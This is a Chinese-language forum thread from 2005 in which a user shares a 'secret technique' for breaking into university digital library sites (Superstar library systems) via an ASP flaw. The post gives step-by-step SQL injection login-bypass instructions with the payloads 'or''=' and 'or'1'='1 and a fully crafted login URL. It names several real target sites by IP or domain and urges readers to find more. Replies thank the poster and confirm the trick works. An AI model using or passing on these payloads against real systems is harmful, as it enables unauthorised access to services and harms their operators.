24小时热门版块排行榜    

查看: 1922  |  回复: 32
当前主题已经存档。
当前只显示满足指定条件的回帖,点击这里查看本话题的所有回帖

applepie119

木虫 (著名写手)

[交流] [分享]新发现利用asp漏洞进超星图书馆秘技

[分享]新发现利用asp漏洞进超星图书馆秘技
这是在看了论坛上的一个帖子后测试找出来的,特向菜鸟们推荐,
希望对大家有所帮助!
深圳广播电视大学数字图书馆
http://218.17.219.22/bookhtm/index.asp
搜索需要输入用户名、密码
我们可以构造查询条件,突破限制
做法如下:
1.随便输入学号、密码,登陆,例如:学号=1,密码=1.这时会出现“此用户不存在!返回”
ie地址栏中地址为:http://218.17.219.22/bookhtm/sq/ ... ;B1.x=31&B1.y=6
2.修改地址进入:
将上面地址中user=1&mima=1改为:user='or''='&mima='or''='
或者user='or'1'='1&mima='or'1'='1 也可
即:http://218.17.219.22/bookhtm/sq/load.asp?user='or''='&mima='or''='&B1.x=31&B1.y=6
就是登陆地址了。
3.登陆后可以随便看了
同样的道理利用这个漏洞,可以登陆另外几个需要输入用户名、密码的站点,需要输入的地方都输上'or''='
如:驻马店电大:http://www.zmdtvu.net/dabookhtm/
铜陵电大:http://218.22.180.149/index.asp其他的自己好好发掘吧,^_^
回复此楼
已阅   回复此楼   关注TA 给TA发消息 送TA红花 TA的回帖

云行天下

铜虫 (小有名气)

0.5

能用,就是资料太少
19楼2005-11-02 23:00:49
已阅   回复此楼   关注TA 给TA发消息 送TA红花 TA的回帖
查看全部 33 个回答

onefan

0.5

thank you very much!
7楼2005-09-10 20:45:41
已阅   回复此楼   关注TA 给TA发消息 送TA红花 TA的回帖

minister6

新虫 (初入文坛)

1

thank you!!!!!!!!
9楼2005-10-07 13:20:51
已阅   回复此楼   关注TA 给TA发消息 送TA红花 TA的回帖
普通表情 高级回复 (可上传附件)
信息提示
请填处理意见